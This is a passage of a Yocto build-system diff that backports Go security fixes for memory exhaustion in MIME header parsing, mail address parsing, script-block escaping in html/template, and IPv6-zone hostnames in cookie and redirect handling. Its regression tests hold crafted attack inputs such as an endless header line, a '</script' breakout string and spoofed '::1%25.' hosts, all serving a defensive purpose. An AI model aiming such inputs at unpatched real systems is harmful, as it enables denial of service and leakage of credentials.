+ src/net/http/cookiejar/jar.go | 7 +++++++
+ src/net/http/cookiejar/jar_test.go | 10 ++++++++++
+ 4 files changed, 24 insertions(+)
+
+diff --git a/src/net/http/client.go b/src/net/http/client.go
+index a496f1c..2031834 100644
+--- a/src/net/http/client.go
++++ b/src/net/http/client.go
+@@ -973,6 +973,12 @@ func isDomainOrSubdomain(sub, parent string) bool {
+ if sub == parent {
+ return true
+ }
++ // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).
++ // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.
++ // For example, "::1%.www.example.com" is not a subdomain of "www.example.com".
++ if strings.ContainsAny(sub, ":%") {
++ return false
++ }
+ // If sub is "foo.example.com" and parent is "example.com",
+ // that means sub must end in "."+parent.
+ // Do it without allocating.
+diff --git a/src/net/http/client_test.go b/src/net/http/client_test.go
+index 2b4f53f..442fe35 100644
+--- a/src/net/http/client_test.go
++++ b/src/net/http/client_test.go
+@@ -1703,6 +1703,7 @@ func TestShouldCopyHeaderOnRedirect(t *testing.T) {
+ {"cookie2", "http://foo.com/", "http://bar.com/", false},
+ {"authorization", "http://foo.com/", "http://bar.com/", false},
+ {"www-authenticate", "http://foo.com/", "http://bar.com/", false},
++ {"authorization", "http://foo.com/", "http://[::1%25.foo.com]/", false},
+
+ // But subdomains should work:
+ {"www-authenticate", "http://foo.com/", "http://foo.com/", true},
+diff --git a/src/net/http/cookiejar/jar.go b/src/net/http/cookiejar/jar.go
+index 9f19917..18cbfc2 100644
+--- a/src/net/http/cookiejar/jar.go
++++ b/src/net/http/cookiejar/jar.go
+@@ -356,6 +356,13 @@ func jarKey(host string, psl PublicSuffixList) string {
+
+ // isIP reports whether host is an IP address.
+ func isIP(host string) bool {
++ if strings.ContainsAny(host, ":%") {
++ // Probable IPv6 address.
++ // Hostnames can't contain : or %, so this is definitely not a valid host.
++ // Treating it as an IP is the more conservative option, and avoids the risk
++ // of interpeting ::1%.www.example.com as a subtomain of www.example.com.
++ return true
++ }
+ return net.ParseIP(host) != nil
+ }
+
+diff --git a/src/net/http/cookiejar/jar_test.go b/src/net/http/cookiejar/jar_test.go
+index 47fb1ab..fd8d40e 100644
+--- a/src/net/http/cookiejar/jar_test.go
++++ b/src/net/http/cookiejar/jar_test.go
+@@ -251,6 +251,7 @@ var isIPTests = map[string]bool{
+ "127.0.0.1": true,
+ "1.2.3.4": true,
+ "2001:4860:0:2001::68": true,
++ "::1%zone": true,
+ "example.com": false,
+ "1.1.1.300": false,
+ "www.foo.bar.net": false,
+@@ -613,6 +614,15 @@ var basicsTests = [...]jarTest{
+ {"http://www.host.test:1234/", "a=1"},
+ },
+ },
++ {
++ "IPv6 zone is not treated as a host.",
++ "https://example.com/",
++ []string{"a=1"},
++ "a=1",
++ []query{
++ {"https://[::1%25.example.com]:80/", ""},
++ },
++ },
+ }
+
+ func TestBasics(t *testing.T) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
new file mode 100644
index 0000000000..ddc2f67c96
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45290.patch
@@ -0,0 +1,271 @@
+From bf80213b121074f4ad9b449410a4d13bae5e9be0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 16 Jan 2024 15:37:52 -0800
+Subject: [PATCH] [release-branch.go1.21] net/textproto, mime/multipart: avoid
+ unbounded read in MIME header
+
+mime/multipart.Reader.ReadForm allows specifying the maximum amount
+of memory that will be consumed by the form. While this limit is
+correctly applied to the parsed form data structure, it was not
+being applied to individual header lines in a form.
+
+For example, when presented with a form containing a header line
+that never ends, ReadForm will continue to read the line until it
+runs out of memory.
+
+Limit the amount of data consumed when reading a header.
+
+Fixes CVE-2023-45290
+Fixes #65389
+For #65383
+
+Change-Id: I7f9264d25752009e95f6b2c80e3d76aaf321d658
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2134435
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2173776
+Reviewed-by: Carlos Amedee <amedee@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/569240
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf80213b121074f4ad9b449410a4d13bae5e9be0]
+CVE: CVE-2023-45290
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata_test.go | 42 +++++++++++++++++++++++++
+ src/net/textproto/reader.go | 48 ++++++++++++++++++++---------
+ src/net/textproto/reader_test.go | 12 ++++++++
+ 3 files changed, 87 insertions(+), 15 deletions(-)
+
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index c78eeb7..f729da6 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -421,6 +421,48 @@ func TestReadFormLimits(t *testing.T) {
+ }
+ }
+
++func TestReadFormEndlessHeaderLine(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ prefix string
++ }{{
++ name: "name",
++ prefix: "X-",
++ }, {
++ name: "value",
++ prefix: "X-Header: ",
++ }, {
++ name: "continuation",
++ prefix: "X-Header: foo\r\n ",
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ const eol = "\r\n"
++ s := `--boundary` + eol
++ s += `Content-Disposition: form-data; name="a"` + eol
++ s += `Content-Type: text/plain` + eol
++ s += test.prefix
++ fr := io.MultiReader(
++ strings.NewReader(s),
++ neverendingReader('X'),
++ )
++ r := NewReader(fr, "boundary")
++ _, err := r.ReadForm(1 << 20)
++ if err != ErrMessageTooLarge {
++ t.Fatalf("ReadForm(1 << 20): %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++type neverendingReader byte
++
++func (r neverendingReader) Read(p []byte) (n int, err error) {
++ for i := range p {
++ p[i] = byte(r)
++ }
++ return len(p), nil
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index ad2d777..cea6613 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -17,6 +17,10 @@ import (
+ "sync"
+ )
+
++// TODO: This should be a distinguishable error (ErrMessageTooLarge)
++// to allow mime/multipart to detect it.
++var errMessageTooLarge = errors.New("message too large")
++
+ // A Reader implements convenience methods for reading requests
+ // or responses from a text protocol network connection.
+ type Reader struct {
+@@ -38,13 +42,13 @@ func NewReader(r *bufio.Reader) *Reader {
+ // ReadLine reads a single line from r,
+ // eliding the final \n or \r\n from the returned string.
+ func (r *Reader) ReadLine() (string, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ return string(line), err
+ }
+
+ // ReadLineBytes is like ReadLine but returns a []byte instead of a string.
+ func (r *Reader) ReadLineBytes() ([]byte, error) {
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(-1)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -53,7 +57,10 @@ func (r *Reader) ReadLineBytes() ([]byte, error) {
+ return line, err
+ }
+
+-func (r *Reader) readLineSlice() ([]byte, error) {
++// readLineSlice reads a single line from r,
++// up to lim bytes long (or unlimited if lim is less than 0),
++// eliding the final \r or \r\n from the returned string.
++func (r *Reader) readLineSlice(lim int64) ([]byte, error) {
+ r.closeDot()
+ var line []byte
+ for {
+@@ -61,6 +68,9 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ if err != nil {
+ return nil, err
+ }
++ if lim >= 0 && int64(len(line))+int64(len(l)) > lim {
++ return nil, errMessageTooLarge
++ }
+ // Avoid the copy if the first call produced a full line.
+ if line == nil && !more {
+ return l, nil
+@@ -93,7 +103,7 @@ func (r *Reader) readLineSlice() ([]byte, error) {
+ // A line consisting of only white space is never continued.
+ //
+ func (r *Reader) ReadContinuedLine() (string, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ return string(line), err
+ }
+
+@@ -114,7 +124,7 @@ func trim(s []byte) []byte {
+ // ReadContinuedLineBytes is like ReadContinuedLine but
+ // returns a []byte instead of a string.
+ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+- line, err := r.readContinuedLineSlice(noValidation)
++ line, err := r.readContinuedLineSlice(-1, noValidation)
+ if line != nil {
+ buf := make([]byte, len(line))
+ copy(buf, line)
+@@ -127,13 +137,14 @@ func (r *Reader) ReadContinuedLineBytes() ([]byte, error) {
+ // returning a byte slice with all lines. The validateFirstLine function
+ // is run on the first read line, and if it returns an error then this
+ // error is returned from readContinuedLineSlice.
+-func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([]byte, error) {
++// It reads up to lim bytes of data (or unlimited if lim is less than 0).
++func (r *Reader) readContinuedLineSlice(lim int64, validateFirstLine func([]byte) error) ([]byte, error) {
+ if validateFirstLine == nil {
+ return nil, fmt.Errorf("missing validateFirstLine func")
+ }
+
+ // Read the first line.
+- line, err := r.readLineSlice()
++ line, err := r.readLineSlice(lim)
+ if err != nil {
+ return nil, err
+ }
+@@ -161,13 +172,21 @@ func (r *Reader) readContinuedLineSlice(validateFirstLine func([]byte) error) ([
+ // copy the slice into buf.
+ r.buf = append(r.buf[:0], trim(line)...)
+
++ if lim < 0 {
++ lim = math.MaxInt64
++ }
++ lim -= int64(len(r.buf))
++
+ // Read continuation lines.
+ for r.skipSpace() > 0 {
+- line, err := r.readLineSlice()
++ r.buf = append(r.buf, ' ')
++ if int64(len(r.buf)) >= lim {
++ return nil, errMessageTooLarge
++ }
++ line, err := r.readLineSlice(lim - int64(len(r.buf)))
+ if err != nil {
+ break
+ }
+- r.buf = append(r.buf, ' ')
+ r.buf = append(r.buf, trim(line)...)
+ }
+ return r.buf, nil
+@@ -512,7 +531,8 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ // The first line cannot start with a leading space.
+ if buf, err := r.R.Peek(1); err == nil && (buf[0] == ' ' || buf[0] == '\t') {
+- line, err := r.readLineSlice()
++ const errorLimit = 80 // arbitrary limit on how much of the line we'll quote
++ line, err := r.readLineSlice(errorLimit)
+ if err != nil {
+ return m, err
+ }
+@@ -520,7 +540,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+
+ for {
+- kv, err := r.readContinuedLineSlice(mustHaveFieldNameColon)
++ kv, err := r.readContinuedLineSlice(maxMemory, mustHaveFieldNameColon)
+ if len(kv) == 0 {
+ return m, err
+ }
+@@ -541,7 +561,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+
+ maxHeaders--
+ if maxHeaders < 0 {
+- return nil, errors.New("message too large")
++ return nil, errMessageTooLarge
+ }
+
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+@@ -567,9 +587,7 @@ func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error)
+ }
+ maxMemory -= int64(len(value))
+ if maxMemory < 0 {
+- // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+- // to allow mime/multipart to detect it.
+- return m, errors.New("message too large")
++ return m, errMessageTooLarge
+ }
+ if vv == nil && len(strs) > 0 {
+ // More than likely this will be a single-element key.
+diff --git a/src/net/textproto/reader_test.go b/src/net/textproto/reader_test.go
+index 3ae0de1..db1ed91 100644
+--- a/src/net/textproto/reader_test.go
++++ b/src/net/textproto/reader_test.go
+@@ -34,6 +34,18 @@ func TestReadLine(t *testing.T) {
+ }
+ }
+
++func TestReadLineLongLine(t *testing.T) {
++ line := strings.Repeat("12345", 10000)
++ r := reader(line + "\r\n")
++ s, err := r.ReadLine()
++ if err != nil {
++ t.Fatalf("Line 1: %v", err)
++ }
++ if s != line {
++ t.Fatalf("%v-byte line does not match expected %v-byte line", len(s), len(line))
++ }
++}
++
+ func TestReadContinuedLine(t *testing.T) {
+ r := reader("line1\nline\n 2\nline3\n")
+ s, err := r.ReadContinuedLine()
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
new file mode 100644
index 0000000000..e9d9d972b9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24784.patch
@@ -0,0 +1,205 @@
+From 5330cd225ba54c7dc78c1b46dcdf61a4671a632c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Wed, 10 Jan 2024 11:02:14 -0800
+Subject: [PATCH] [release-branch.go1.22] net/mail: properly handle special
+ characters in phrase and obs-phrase
+
+Fixes a couple of misalignments with RFC 5322 which introduce
+significant diffs between (mostly) conformant parsers.
+
+This change reverts the changes made in CL50911, which allowed certain
+special RFC 5322 characters to appear unquoted in the "phrase" syntax.
+It is unclear why this change was made in the first place, and created
+a divergence from comformant parsers. In particular this resulted in
+treating comments in display names incorrectly.
+
+Additionally properly handle trailing malformed comments in the group
+syntax.
+
+For #65083
+Fixed #65849
+
+Change-Id: I00dddc044c6ae3381154e43236632604c390f672
+Reviewed-on: https://go-review.googlesource.com/c/go/+/555596
+Reviewed-by: Damien Neil <dneil@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/566215
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5330cd225ba54c7dc78c1b46dcdf61a4671a632c]
+CVE: CVE-2024-24784
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/net/mail/message.go | 30 +++++++++++++++------------
+ src/net/mail/message_test.go | 40 ++++++++++++++++++++++++++----------
+ 2 files changed, 46 insertions(+), 24 deletions(-)
+
+diff --git a/src/net/mail/message.go b/src/net/mail/message.go
+index af516fc30f470..fc2a9e46f811b 100644
+--- a/src/net/mail/message.go
++++ b/src/net/mail/message.go
+@@ -280,7 +280,7 @@ func (a *Address) String() string {
+ // Add quotes if needed
+ quoteLocal := false
+ for i, r := range local {
+- if isAtext(r, false, false) {
++ if isAtext(r, false) {
+ continue
+ }
+ if r == '.' {
+@@ -444,7 +444,7 @@ func (p *addrParser) parseAddress(handleGroup bool) ([]*Address, error) {
+ if !p.consume('<') {
+ atext := true
+ for _, r := range displayName {
+- if !isAtext(r, true, false) {
++ if !isAtext(r, true) {
+ atext = false
+ break
+ }
+@@ -479,7 +479,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ // handle empty group.
+ p.skipSpace()
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ return group, nil
+ }
+
+@@ -496,7 +498,9 @@ func (p *addrParser) consumeGroupList() ([]*Address, error) {
+ return nil, errors.New("mail: misformatted parenthetical comment")
+ }
+ if p.consume(';') {
+- p.skipCFWS()
++ if !p.skipCFWS() {
++ return nil, errors.New("mail: misformatted parenthetical comment")
++ }
+ break
+ }
+ if !p.consume(',') {
+@@ -566,6 +570,12 @@ func (p *addrParser) consumePhrase() (phrase string, err error) {
+ var words []string
+ var isPrevEncoded bool
+ for {
++ // obs-phrase allows CFWS after one word
++ if len(words) > 0 {
++ if !p.skipCFWS() {
++ return "", errors.New("mail: misformatted parenthetical comment")
++ }
++ }
+ // word = atom / quoted-string
+ var word string
+ p.skipSpace()
+@@ -661,7 +671,6 @@ Loop:
+ // If dot is true, consumeAtom parses an RFC 5322 dot-atom instead.
+ // If permissive is true, consumeAtom will not fail on:
+ // - leading/trailing/double dots in the atom (see golang.org/issue/4938)
+-// - special characters (RFC 5322 3.2.3) except '<', '>', ':' and '"' (see golang.org/issue/21018)
+ func (p *addrParser) consumeAtom(dot bool, permissive bool) (atom string, err error) {
+ i := 0
+
+@@ -672,7 +681,7 @@ Loop:
+ case size == 1 && r == utf8.RuneError:
+ return "", fmt.Errorf("mail: invalid utf-8 in address: %q", p.s)
+
+- case size == 0 || !isAtext(r, dot, permissive):
++ case size == 0 || !isAtext(r, dot):
+ break Loop
+
+ default:
+@@ -850,18 +859,13 @@ func (e charsetError) Error() string {
+
+ // isAtext reports whether r is an RFC 5322 atext character.
+ // If dot is true, period is included.
+-// If permissive is true, RFC 5322 3.2.3 specials is included,
+-// except '<', '>', ':' and '"'.
+-func isAtext(r rune, dot, permissive bool) bool {
++func isAtext(r rune, dot bool) bool {
+ switch r {
+ case '.':
+ return dot
+
+ // RFC 5322 3.2.3. specials
+- case '(', ')', '[', ']', ';', '@', '\\', ',':
+- return permissive
+-
+- case '<', '>', '"', ':':
++ case '(', ')', '<', '>', '[', ']', ':', ';', '@', '\\', ',', '"': // RFC 5322 3.2.3. specials
+ return false
+ }
+ return isVchar(r)
+diff --git a/src/net/mail/message_test.go b/src/net/mail/message_test.go
+index 1e1bb4092f659..1f2f62afbf406 100644
+--- a/src/net/mail/message_test.go
++++ b/src/net/mail/message_test.go
+@@ -385,8 +385,11 @@ func TestAddressParsingError(t *testing.T) {
+ 13: {"group not closed: null@example.com", "expected comma"},
+ 14: {"group: first@example.com, second@example.com;", "group with multiple addresses"},
+ 15: {"john.doe", "missing '@' or angle-addr"},
+- 16: {"john.doe@", "no angle-addr"},
++ 16: {"john.doe@", "missing '@' or angle-addr"},
+ 17: {"John Doe@foo.bar", "no angle-addr"},
++ 18: {" group: null@example.com; (asd", "misformatted parenthetical comment"},
++ 19: {" group: ; (asd", "misformatted parenthetical comment"},
++ 20: {`(John) Doe <jdoe@machine.example>`, "missing word in phrase:"},
+ }
+
+ for i, tc := range mustErrTestCases {
+@@ -436,24 +439,19 @@ func TestAddressParsing(t *testing.T) {
+ Address: "john.q.public@example.com",
+ }},
+ },
+- {
+- `"John (middle) Doe" <jdoe@machine.example>`,
+- []*Address{{
+- Name: "John (middle) Doe",
+- Address: "jdoe@machine.example",
+- }},
+- },
++ // Comment in display name
+ {
+ `John (middle) Doe <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John (middle) Doe",
++ Name: "John Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
++ // Display name is quoted string, so comment is not a comment
+ {
+- `John !@M@! Doe <jdoe@machine.example>`,
++ `"John (middle) Doe" <jdoe@machine.example>`,
+ []*Address{{
+- Name: "John !@M@! Doe",
++ Name: "John (middle) Doe",
+ Address: "jdoe@machine.example",
+ }},
+ },
+@@ -788,6 +786,26 @@ func TestAddressParsing(t *testing.T) {
+ },
+ },
+ },
++ // Comment in group display name
++ {
++ `group (comment:): a@example.com, b@example.com;`,
++ []*Address{
++ {
++ Address: "a@example.com",
++ },
++ {
++ Address: "b@example.com",
++ },
++ },
++ },
++ {
++ `x(:"):"@a.example;("@b.example;`,
++ []*Address{
++ {
++ Address: `@a.example;(@b.example`,
++ },
++ },
++ },
+ }
+ for _, test := range tests {
+ if len(test.exp) == 1 {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
new file mode 100644
index 0000000000..1398a2ca48
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2024-24785.patch
@@ -0,0 +1,197 @@
+From 3643147a29352ca2894fd5d0d2069bc4b4335a7e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 14 Feb 2024 17:18:36 -0800
+Subject: [PATCH] [release-branch.go1.21] html/template: escape additional
+ tokens in MarshalJSON errors
+
+Escape "</script" and "<!--" in errors returned from MarshalJSON errors
+when attempting to marshal types in script blocks. This prevents any
+user controlled content from prematurely terminating the script block.
+
+Updates #65697
+Fixes #65968
+
+Change-Id: Icf0e26c54ea7d9c1deed0bff11b6506c99ddef1b
+Reviewed-on: https://go-review.googlesource.com/c/go/+/564196
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit ccbc725f2d678255df1bd326fa511a492aa3a0aa)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/567515
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/3643147a29352ca2894fd5d0d2069bc4b4335a7e]
+CVE: CVE-2024-24785
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 22 ++++++++-
+ src/html/template/js_test.go | 96 ++++++++++++++++++++----------------
+ 2 files changed, 74 insertions(+), 44 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 35994f0..4d3b25d 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -171,13 +171,31 @@ func jsValEscaper(args ...interface{}) string {
+ // cyclic data. This may be an unacceptable DoS risk.
+ b, err := json.Marshal(a)
+ if err != nil {
+- // Put a space before comment so that if it is flush against
++ // While the standard JSON marshaller does not include user controlled
++ // information in the error message, if a type has a MarshalJSON method,
++ // the content of the error message is not guaranteed. Since we insert
++ // the error into the template, as part of a comment, we attempt to
++ // prevent the error from either terminating the comment, or the script
++ // block itself.
++ //
++ // In particular we:
++ // * replace "*/" comment end tokens with "* /", which does not
++ // terminate the comment
++ // * replace "</script" with "\x3C/script", and "<!--" with
++ // "\x3C!--", which prevents confusing script block termination
++ // semantics
++ //
++ // We also put a space before the comment so that if it is flush against
+ // a division operator it is not turned into a line comment:
+ // x/{{y}}
+ // turning into
+ // x//* error marshaling y:
+ // second line of error message */null
+- return fmt.Sprintf(" /* %s */null ", strings.ReplaceAll(err.Error(), "*/", "* /"))
++ errStr := err.Error()
++ errStr = strings.ReplaceAll(errStr, "*/", "* /")
++ errStr = strings.ReplaceAll(errStr, "</script", `\x3C/script`)
++ errStr = strings.ReplaceAll(errStr, "<!--", `\x3C!--`)
++ return fmt.Sprintf(" /* %s */null ", errStr)
+ }
+
+ // TODO: maybe post-process output to prevent it from containing
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index de9ef28..3fc3baf 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "bytes"
+ "math"
+ "strings"
+@@ -104,61 +105,72 @@ func TestNextJsCtx(t *testing.T) {
+ }
+ }
+
++type jsonErrType struct{}
++
++func (e *jsonErrType) MarshalJSON() ([]byte, error) {
++ return nil, errors.New("beep */ boop </script blip <!--")
++}
++
+ func TestJSValEscaper(t *testing.T) {
+ tests := []struct {
+- x interface{}
+- js string
++ x interface{}
++ js string
++ skipNest bool
+ }{
+- {int(42), " 42 "},
+- {uint(42), " 42 "},
+- {int16(42), " 42 "},
+- {uint16(42), " 42 "},
+- {int32(-42), " -42 "},
+- {uint32(42), " 42 "},
+- {int16(-42), " -42 "},
+- {uint16(42), " 42 "},
+- {int64(-42), " -42 "},
+- {uint64(42), " 42 "},
+- {uint64(1) << 53, " 9007199254740992 "},
++ {int(42), " 42 ", false},
++ {uint(42), " 42 ", false},
++ {int16(42), " 42 ", false},
++ {uint16(42), " 42 ", false},
++ {int32(-42), " -42 ", false},
++ {uint32(42), " 42 ", false},
++ {int16(-42), " -42 ", false},
++ {uint16(42), " 42 ", false},
++ {int64(-42), " -42 ", false},
++ {uint64(42), " 42 ", false},
++ {uint64(1) << 53, " 9007199254740992 ", false},
+ // ulp(1 << 53) > 1 so this loses precision in JS
+ // but it is still a representable integer literal.
+- {uint64(1)<<53 + 1, " 9007199254740993 "},
+- {float32(1.0), " 1 "},
+- {float32(-1.0), " -1 "},
+- {float32(0.5), " 0.5 "},
+- {float32(-0.5), " -0.5 "},
+- {float32(1.0) / float32(256), " 0.00390625 "},
+- {float32(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {float64(1.0), " 1 "},
+- {float64(-1.0), " -1 "},
+- {float64(0.5), " 0.5 "},
+- {float64(-0.5), " -0.5 "},
+- {float64(0), " 0 "},
+- {math.Copysign(0, -1), " -0 "},
+- {"", `""`},
+- {"foo", `"foo"`},
++ {uint64(1)<<53 + 1, " 9007199254740993 ", false},
++ {float32(1.0), " 1 ", false},
++ {float32(-1.0), " -1 ", false},
++ {float32(0.5), " 0.5 ", false},
++ {float32(-0.5), " -0.5 ", false},
++ {float32(1.0) / float32(256), " 0.00390625 ", false},
++ {float32(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {float64(1.0), " 1 ", false},
++ {float64(-1.0), " -1 ", false},
++ {float64(0.5), " 0.5 ", false},
++ {float64(-0.5), " -0.5 ", false},
++ {float64(0), " 0 ", false},
++ {math.Copysign(0, -1), " -0 ", false},
++ {"", `""`, false},
++ {"foo", `"foo"`, false},
+ // Newlines.
+- {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
++ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`, false},
+ // "\v" == "v" on IE 6 so use "\u000b" instead.
+- {"\t\x0b", `"\t\u000b"`},
+- {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+- {[]interface{}{}, "[]"},
+- {[]interface{}{42, "foo", nil}, `[42,"foo",null]`},
+- {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`},
+- {"<!--", `"\u003c!--"`},
+- {"-->", `"--\u003e"`},
+- {"<![CDATA[", `"\u003c![CDATA["`},
+- {"]]>", `"]]\u003e"`},
+- {"</script", `"\u003c/script"`},
+- {"\U0001D11E", "\"\U0001D11E\""}, // or "\uD834\uDD1E"
+- {nil, " null "},
++ {"\t\x0b", `"\t\u000b"`, false},
++ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`, false},
++ {[]interface{}{}, "[]", false},
++ {[]interface{}{42, "foo", nil}, `[42,"foo",null]`, false},
++ {[]string{"<!--", "</script>", "-->"}, `["\u003c!--","\u003c/script\u003e","--\u003e"]`, false},
++ {"<!--", `"\u003c!--"`, false},
++ {"-->", `"--\u003e"`, false},
++ {"<![CDATA[", `"\u003c![CDATA["`, false},
++ {"]]>", `"]]\u003e"`, false},
++ {"</script", `"\u003c/script"`, false},
++ {"\U0001D11E", "\"\U0001D11E\"", false}, // or "\uD834\uDD1E"
++ {nil, " null ", false},
++ {&jsonErrType{}, " /* json: error calling MarshalJSON for type *template.jsonErrType: beep * / boop \\x3C/script blip \\x3C!-- */null ", true},
+ }
+
+ for _, test := range tests {
+ if js := jsValEscaper(test.x); js != test.js {
+ t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
+ }
++ if test.skipNest {
++ continue
++ }
+ // Make sure that escaping corner cases are not broken
+ // by nesting.
+ a := []interface{}{test.x}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-crosssdk.inc b/meta/recipes-devtools/go/go-crosssdk.inc
index f0bec79719..36c9b12af8 100644
--- a/meta/recipes-devtools/go/go-crosssdk.inc
+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
PN = "go-crosssdk-${SDK_SYS}"
PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
+export GOCACHE = "${B}/.cache"
+
do_configure[noexec] = "1"
do_compile() {
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
GO_IMPORT = "github.com/golang/dep"
-SRC_URI = "git://${GO_IMPORT} \
+SRC_URI = "git://${GO_IMPORT};branch=master \
file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
"
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
export GOBUILDMODE=""
export CGO_ENABLED_riscv64 = ""
-# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv
-# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its
-# variants.
+# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
+# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
+# for windows/mips/riscv and their variants.
python() {
- if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True):
- d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel")
+ if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
+ d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
else:
